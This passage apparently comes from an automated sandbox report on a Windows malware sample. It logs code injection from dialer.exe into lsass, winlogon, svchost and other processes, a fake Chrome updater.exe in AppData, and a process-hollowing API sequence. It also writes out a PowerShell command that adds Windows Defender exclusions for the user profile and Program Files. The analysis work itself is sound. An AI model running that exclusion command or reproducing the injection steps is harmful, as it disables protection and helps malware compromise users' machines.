                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000202C0AE7E70
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000202C0AEB50C
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000002A661307E70
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000002A66130B50C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002BAAE297E70
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000002BAAE29B50C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000026A879CB50C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000026A879C7E70
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000179537AB50C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000179537A7E70
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000017953D4B50C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000017953D47E70
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002295D567E70
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002295D56B50C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000025306E67E70
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000025306E6B50C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001845B3B7E70
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001845B3BB50C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001ADECD4B50C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001ADECD47E70
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001D55907B50C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001D559077E70
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000241A9EAB50C
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000241A9EA7E70
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000002152C3EB50C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000002152C3E7E70
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001CD73197E70
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001CD7319B50C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002824E89B50C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002824E897E70
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002824E8FB50C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002824E8F7E70
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000021B47B37E70
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000021B47B3B50C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAE260000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87F40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 179537D0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D590000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25306E90000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B940000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADECD70000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D5590A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9ED0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD731C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E8C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B47B60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20870090000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17184290000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3FA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166980000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F4197C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F8F1A00000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 228BE340000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20823A10000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 144B2660000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1988E640000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F724890000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,4_2_00007FF78AB31DB4
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: AE262908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B382908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 2C1A2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC672908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0B12908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61332908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AED82908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87F42908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 537D2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D592908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E92908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B942908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ECD72908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 590A2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9ED2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 731C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E8C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 47B62908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 70092908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84292908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D3FA2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C0262908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C9F32908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 645B2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F62908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2AB42908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4ADB2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1992908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 25DA2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F5352908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F0D62908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: FFB2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2572908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCF2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66982908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D572908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B42908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC742908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA72908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3892908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B82908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E42908
